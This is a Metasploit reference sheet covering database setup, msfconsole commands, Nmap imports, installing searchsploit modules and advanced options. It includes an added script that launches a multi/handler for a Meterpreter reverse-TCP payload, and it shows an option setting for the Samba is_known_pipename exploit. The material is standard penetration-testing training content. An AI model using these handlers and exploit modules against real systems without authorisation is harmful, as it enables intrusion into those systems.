Metasploit
Setup
Start the postgresql service:
systemctl start postgresql
Enable the postgresql service at boot:
systemctl enable postgresql
Create and initialize the MSF database:
msfdb init
Update Metasploit:
apt update && apt install metasploit-framework
Start Metasploit quietly:
msfconsole -q
Commands
use: activate a module
use exploit/multi/handler
back: go back to the main prompt
previous: activate the previously-used module
show: display module-related info
show options
show payloads
show targets
set/unset: configure options for the currently-used module
set LHOST tun0
set LPORT 443
unset LHOST
unset LPORT
setg/unsetg: configure options globally, for all modules, for the rest of this Metasploit session (global values persist only for the session unless written out with save)
setg LHOST tun0
setg LPORT 443
unsetg LHOST
unsetg LPORT
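The commands above are normally combined into a resource script rather than typed by hand. The following added example (not from the original page) generates one that sets the global LHOST and LPORT used above, configures exploit/multi/handler, starts it as a background job, and then launches msfconsole -q -r with it. The payload name, the ExitOnSession setting and the output file location are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): build an msfconsole resource
# script from the values used above (LHOST tun0, LPORT 443) and launch it.
# The payload name and the output file path are assumptions for illustration.

# write_handler_rc FILE LHOST LPORT PAYLOAD
# Writes a resource script that sets global LHOST/LPORT, starts a
# multi/handler as a background job (exploit -j) and keeps it listening
# for further connections (ExitOnSession false).
write_handler_rc() {
    file="$1"; lhost="$2"; lport="$3"; payload="$4"
    cat > "$file" <<EOF
setg LHOST $lhost
setg LPORT $lport
use exploit/multi/handler
set PAYLOAD $payload
set ExitOnSession false
show options
exploit -j
EOF
}

# Only launch msfconsole when invoked as "sh handler.sh run", so the
# function can be sourced and inspected without starting Metasploit.
if [ "$1" = "run" ]; then
    rc="${TMPDIR:-/tmp}/handler.rc"
    write_handler_rc "$rc" "${LHOST:-tun0}" "${LPORT:-443}" \
        "${PAYLOAD:-linux/x64/meterpreter/reverse_tcp}"
    msfconsole -q -r "$rc"
fi
```

Run it with sh handler.sh run; LHOST, LPORT and PAYLOAD can be overridden through the environment. Because the function only writes the file, the generated script can be reviewed before msfconsole ever starts.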
Database Access
Show the services stored in the database for the current workspace:
msf6 > services
Filter the stored services by port, for example 445:
msf6 > services -p 445
Run Nmap and save the findings to the database (requires a connected database; check with db_status):
msf6 > db_nmap <remote_ip> -A -Pn
Display all discovered hosts:
msf6 > hosts
Add Exploits to Metasploit
If searchsploit finds a Metasploit module (a .rb file) that is not shipped with the installed framework, add it manually by copying it into the module tree under the subpath matching its type and platform, for example:
cp <exploit_path> /usr/share/metasploit-framework/modules/exploits/linux/http
The same subpath under ~/.msf4/modules (the per-user module directory) also works and survives a package update. The directory path becomes the module name, so a file copied into exploits/linux/http is used as exploit/linux/http/<name>.
Then, in Metasploit, run reload_all to load the new module:
msf6 > reload_all
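As an added example (not from the original page), the following script performs the copy step with the checks a practitioner wants: it refuses files that do not define a MetasploitModule class (a standalone Ruby or Python PoC will not load with reload_all), keeps the module's intended subpath so the module name is right, installs under the per-user tree ~/.msf4/modules by default, and prints the name to pass to use after reload_all. The helper name and the sanity checks are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): install a third-party
# Metasploit module into the per-user module tree instead of
# /usr/share/metasploit-framework, so a package update cannot overwrite it.
# The helper name, default root and sanity checks are assumptions.

# install_msf_module FILE MODULE_DIR [ROOT]
#   FILE        the .rb file searchsploit found, e.g. 12345.rb
#   MODULE_DIR  where it belongs in the tree, e.g. exploits/linux/http
#   ROOT        module root, defaults to ~/.msf4/modules
# Prints the module name to give to "use" on success, returns 1 on error.
install_msf_module() {
    src="$1"; moddir="$2"; root="${3:-$HOME/.msf4/modules}"

    [ -f "$src" ] || { echo "no such file: $src" >&2; return 1; }
    case "$src" in *.rb) ;; *) echo "not a Ruby file: $src" >&2; return 1 ;; esac

    # A loadable module declares a MetasploitModule class; anything else
    # will be silently skipped (or error out) when reload_all runs.
    grep -q 'class MetasploitModule' "$src" || {
        echo "$src does not define MetasploitModule" >&2; return 1; }

    # The directory path becomes the module name, so it must start with a
    # module type directory and keep the exploit's intended subpath.
    case "$moddir" in
        exploits/?*|auxiliary/?*|post/?*|payloads/?*|encoders/?*|nops/?*|evasion/?*) ;;
        *) echo "module dir must look like exploits/<platform>/<service>" >&2; return 1 ;;
    esac

    mkdir -p "$root/$moddir"
    cp "$src" "$root/$moddir/"

    # Build the name as shown by "use": the type directory is singular.
    base="$(basename "$src" .rb)"
    type="${moddir%%/*}"; rest="${moddir#*/}"
    case "$type" in
        exploits) use="exploit/$rest/$base" ;;
        payloads) use="payload/$rest/$base" ;;
        encoders) use="encoder/$rest/$base" ;;
        nops)     use="nop/$rest/$base" ;;
        *)        use="$type/$rest/$base" ;;
    esac
    echo "$use"
}
```

After the script prints the name, run reload_all in msfconsole and then use <printed name>; if the module does not appear, the path given as MODULE_DIR did not match the module's intended location.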
Advanced Options
Metasploit modules also have advanced options, which are not shown by show options; list them with show advanced. For example, exploit/linux/samba/is_known_pipename may need the SMB protocol version forced to 1, which is done through one of the advanced options:
Set SMB::ProtocolVersion to 1:
msf6 exploit(linux/samba/is_known_pipename) > set SMB::ProtocolVersion 1